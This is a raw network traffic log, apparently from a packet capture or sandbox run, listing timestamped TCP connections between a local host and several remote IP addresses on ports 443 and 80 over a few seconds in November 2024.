Nov 13, 2024 20:39:32.935375929 CET	443	49789	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.937887907 CET	49799	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.937895060 CET	443	49799	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.938059092 CET	49799	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.938112974 CET	49799	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.938119888 CET	443	49799	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.939996958 CET	443	49788	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.940187931 CET	443	49788	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.940260887 CET	49788	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.940470934 CET	49788	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.940470934 CET	49788	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.940515041 CET	443	49788	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.940545082 CET	443	49788	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.942787886 CET	49800	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.942835093 CET	443	49800	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.942889929 CET	49800	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.943048000 CET	49800	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.943068027 CET	443	49800	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.956105947 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:32.956144094 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:32.956162930 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:32.956212997 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:32.956218958 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:32.956255913 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:32.956681967 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:32.957081079 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:32.957130909 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:32.957135916 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:32.965079069 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:32.965125084 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:32.965131044 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:32.983521938 CET	443	49790	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.983966112 CET	443	49790	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.984030962 CET	49790	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.984097004 CET	49790	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.984097004 CET	49790	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.984127045 CET	443	49790	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.984150887 CET	443	49790	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.987030983 CET	49801	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.987127066 CET	443	49801	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:32.987221956 CET	49801	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.987380981 CET	49801	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:32.987416029 CET	443	49801	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.010894060 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.010900974 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.057775974 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.079838037 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.079886913 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.079905987 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.079921007 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.079930067 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.079940081 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.079984903 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.080748081 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.080797911 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.080802917 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.089517117 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.089565039 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.089575052 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.098649025 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.098701000 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.098710060 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.106933117 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.106976032 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.106982946 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.117080927 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.117130995 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.117137909 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.144128084 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.144160986 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.144180059 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.144186020 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.144207954 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.144226074 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.146316051 CET	443	49791	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:33.146558046 CET	49791	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:33.146625042 CET	443	49791	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:33.146977901 CET	443	49791	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:33.147327900 CET	49791	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:33.147406101 CET	443	49791	142.250.186.164	192.168.2.5
Nov 13, 2024 20:39:33.198966026 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.198976994 CET	49791	443	192.168.2.5	142.250.186.164
Nov 13, 2024 20:39:33.198997974 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.203005075 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.203039885 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.203058004 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.203062057 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.203074932 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.203102112 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.203116894 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.203156948 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.203162909 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.203814983 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.203871965 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.203876972 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.204499006 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.204546928 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.204552889 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.204725027 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.204757929 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.204786062 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.204792023 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.204837084 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.206537008 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.212722063 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.212745905 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.212766886 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.212770939 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.212827921 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.218709946 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.224905014 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.224931002 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.224947929 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.224956989 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.224992990 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.230988979 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.236965895 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.236987114 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.237023115 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.237046957 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.237087965 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.242969036 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.248889923 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.248908043 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.248931885 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.248954058 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.248991013 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.254935980 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.261147022 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.261167049 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.261208057 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.261229038 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.261265993 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.267043114 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.273092985 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.273113012 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.273145914 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.273169994 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.273211956 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.279304028 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.285217047 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.285267115 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.285285950 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.326150894 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.326168060 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.326198101 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.326220989 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.326260090 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.326313019 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.326440096 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.326461077 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.326468945 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.326476097 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.326505899 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.326513052 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.326517105 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.326546907 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.326550961 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.327248096 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.327272892 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.327291012 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.327301979 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.327336073 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.327342033 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.330065012 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.330090046 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.330106020 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.330123901 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.330158949 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.333096027 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.386465073 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.386493921 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.390506983 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.390594959 CET	443	49785	216.58.206.46	192.168.2.5
Nov 13, 2024 20:39:33.390649080 CET	49785	443	192.168.2.5	216.58.206.46
Nov 13, 2024 20:39:33.424876928 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:33.425719976 CET	49804	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:33.429786921 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:33.430512905 CET	80	49804	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:33.430641890 CET	49804	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:33.431555986 CET	49804	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:33.436367989 CET	80	49804	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:33.449553013 CET	49805	443	192.168.2.5	4.245.163.56
Nov 13, 2024 20:39:33.449580908 CET	443	49805	4.245.163.56	192.168.2.5
Nov 13, 2024 20:39:33.449647903 CET	49805	443	192.168.2.5	4.245.163.56
Nov 13, 2024 20:39:33.451570988 CET	49805	443	192.168.2.5	4.245.163.56
Nov 13, 2024 20:39:33.451585054 CET	443	49805	4.245.163.56	192.168.2.5
Nov 13, 2024 20:39:33.554517031 CET	443	49793	184.28.90.27	192.168.2.5
Nov 13, 2024 20:39:33.554723024 CET	49793	443	192.168.2.5	184.28.90.27
Nov 13, 2024 20:39:33.556474924 CET	49793	443	192.168.2.5	184.28.90.27
Nov 13, 2024 20:39:33.556505919 CET	443	49793	184.28.90.27	192.168.2.5
Nov 13, 2024 20:39:33.556750059 CET	443	49793	184.28.90.27	192.168.2.5
Nov 13, 2024 20:39:33.563779116 CET	443	49795	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.564172983 CET	49795	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.564197063 CET	443	49795	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.564697027 CET	49795	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.564702988 CET	443	49795	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.605226994 CET	49793	443	192.168.2.5	184.28.90.27
Nov 13, 2024 20:39:33.632742882 CET	49793	443	192.168.2.5	184.28.90.27
Nov 13, 2024 20:39:33.644890070 CET	443	49794	142.250.181.238	192.168.2.5
Nov 13, 2024 20:39:33.645168066 CET	49794	443	192.168.2.5	142.250.181.238
Nov 13, 2024 20:39:33.645201921 CET	443	49794	142.250.181.238	192.168.2.5
Nov 13, 2024 20:39:33.645735025 CET	443	49794	142.250.181.238	192.168.2.5
Nov 13, 2024 20:39:33.645827055 CET	49794	443	192.168.2.5	142.250.181.238
Nov 13, 2024 20:39:33.646735907 CET	443	49794	142.250.181.238	192.168.2.5
Nov 13, 2024 20:39:33.646792889 CET	49794	443	192.168.2.5	142.250.181.238
Nov 13, 2024 20:39:33.647795916 CET	49794	443	192.168.2.5	142.250.181.238
Nov 13, 2024 20:39:33.647885084 CET	443	49794	142.250.181.238	192.168.2.5
Nov 13, 2024 20:39:33.647967100 CET	49794	443	192.168.2.5	142.250.181.238
Nov 13, 2024 20:39:33.647975922 CET	443	49794	142.250.181.238	192.168.2.5
Nov 13, 2024 20:39:33.647996902 CET	49794	443	192.168.2.5	142.250.181.238
Nov 13, 2024 20:39:33.672976971 CET	443	49797	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.673398972 CET	49797	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.673412085 CET	443	49797	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.673899889 CET	49797	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.673908949 CET	443	49797	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.679328918 CET	443	49793	184.28.90.27	192.168.2.5
Nov 13, 2024 20:39:33.691324949 CET	443	49794	142.250.181.238	192.168.2.5
Nov 13, 2024 20:39:33.693367004 CET	443	49800	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.693747997 CET	49800	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.693773985 CET	443	49800	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.694307089 CET	443	49795	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.694401979 CET	49800	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.694407940 CET	443	49800	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.694484949 CET	443	49795	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.694536924 CET	49795	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.694569111 CET	49795	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.694569111 CET	49795	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.694583893 CET	443	49795	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.694591999 CET	443	49795	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.697257042 CET	49806	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.697297096 CET	443	49806	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.697453976 CET	49806	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.697505951 CET	49806	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.697511911 CET	443	49806	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.698687077 CET	49794	443	192.168.2.5	142.250.181.238
Nov 13, 2024 20:39:33.710705996 CET	443	49799	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.711091042 CET	49799	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.711097956 CET	443	49799	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.711500883 CET	49799	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.711504936 CET	443	49799	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.726700068 CET	443	49801	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.727047920 CET	49801	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.727111101 CET	443	49801	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.727446079 CET	49801	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.727461100 CET	443	49801	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.814559937 CET	443	49797	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.815350056 CET	443	49797	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.815398932 CET	49797	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.815838099 CET	49797	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.815850973 CET	443	49797	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.815859079 CET	49797	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.815864086 CET	443	49797	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.819304943 CET	49807	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.819354057 CET	443	49807	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.819411039 CET	49807	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.819566965 CET	49807	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.819578886 CET	443	49807	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.824078083 CET	443	49800	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.824213028 CET	443	49800	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.824482918 CET	49800	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.825041056 CET	49800	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.825041056 CET	49800	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.825059891 CET	443	49800	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.825069904 CET	443	49800	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.834821939 CET	49808	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.834875107 CET	443	49808	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.834949970 CET	49808	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.835722923 CET	49808	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.835758924 CET	443	49808	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.846174002 CET	443	49799	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.846256018 CET	443	49799	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.846321106 CET	49799	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.846760988 CET	49799	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.846777916 CET	443	49799	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.846798897 CET	49799	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.846806049 CET	443	49799	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.851352930 CET	49809	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.851393938 CET	443	49809	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.851461887 CET	49809	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.851650000 CET	49809	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.851665974 CET	443	49809	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.857650995 CET	443	49801	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.857806921 CET	443	49801	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.857988119 CET	49801	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.860539913 CET	49801	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.860541105 CET	49801	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.860589981 CET	443	49801	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.860621929 CET	443	49801	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.866034985 CET	49810	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.866086960 CET	443	49810	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.866167068 CET	49810	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.868398905 CET	49810	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:33.868431091 CET	443	49810	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:33.876302004 CET	443	49793	184.28.90.27	192.168.2.5
Nov 13, 2024 20:39:33.876358032 CET	443	49793	184.28.90.27	192.168.2.5
Nov 13, 2024 20:39:33.876416922 CET	49793	443	192.168.2.5	184.28.90.27
Nov 13, 2024 20:39:33.877170086 CET	49793	443	192.168.2.5	184.28.90.27
Nov 13, 2024 20:39:33.877204895 CET	443	49793	184.28.90.27	192.168.2.5
Nov 13, 2024 20:39:33.877233982 CET	49793	443	192.168.2.5	184.28.90.27
Nov 13, 2024 20:39:33.877250910 CET	443	49793	184.28.90.27	192.168.2.5
Nov 13, 2024 20:39:33.898915052 CET	443	49794	142.250.181.238	192.168.2.5
Nov 13, 2024 20:39:33.947045088 CET	49811	443	192.168.2.5	184.28.90.27
Nov 13, 2024 20:39:33.947122097 CET	443	49811	184.28.90.27	192.168.2.5
Nov 13, 2024 20:39:33.947197914 CET	49811	443	192.168.2.5	184.28.90.27
Nov 13, 2024 20:39:33.947494984 CET	49811	443	192.168.2.5	184.28.90.27
Nov 13, 2024 20:39:33.947527885 CET	443	49811	184.28.90.27	192.168.2.5
Nov 13, 2024 20:39:33.949161053 CET	49794	443	192.168.2.5	142.250.181.238
Nov 13, 2024 20:39:33.949198961 CET	443	49794	142.250.181.238	192.168.2.5
Nov 13, 2024 20:39:33.950469017 CET	49794	443	192.168.2.5	142.250.181.238
Nov 13, 2024 20:39:33.950558901 CET	443	49794	142.250.181.238	192.168.2.5
Nov 13, 2024 20:39:33.950618029 CET	49794	443	192.168.2.5	142.250.181.238
Nov 13, 2024 20:39:34.394243002 CET	49813	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:34.394277096 CET	443	49813	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:34.397699118 CET	49813	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:34.397699118 CET	49813	443	192.168.2.5	40.115.3.253
Nov 13, 2024 20:39:34.397731066 CET	443	49813	40.115.3.253	192.168.2.5
Nov 13, 2024 20:39:34.437877893 CET	443	49806	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.438540936 CET	49806	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.438572884 CET	443	49806	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.440465927 CET	49806	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.440471888 CET	443	49806	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.592124939 CET	443	49805	4.245.163.56	192.168.2.5
Nov 13, 2024 20:39:34.592212915 CET	49805	443	192.168.2.5	4.245.163.56
Nov 13, 2024 20:39:34.593935966 CET	49805	443	192.168.2.5	4.245.163.56
Nov 13, 2024 20:39:34.593944073 CET	443	49805	4.245.163.56	192.168.2.5
Nov 13, 2024 20:39:34.594253063 CET	443	49805	4.245.163.56	192.168.2.5
Nov 13, 2024 20:39:34.599659920 CET	443	49807	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.600018024 CET	49807	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.600056887 CET	443	49807	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.600728035 CET	49807	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.600739956 CET	443	49807	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.608731985 CET	443	49806	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.608891010 CET	443	49806	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.608931065 CET	443	49809	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.609241009 CET	49806	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.609317064 CET	49806	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.609317064 CET	49806	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:34.609338999 CET	443	49806	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:34.609354973 CET	443	49806	13.107.246.45	192.168.2.5
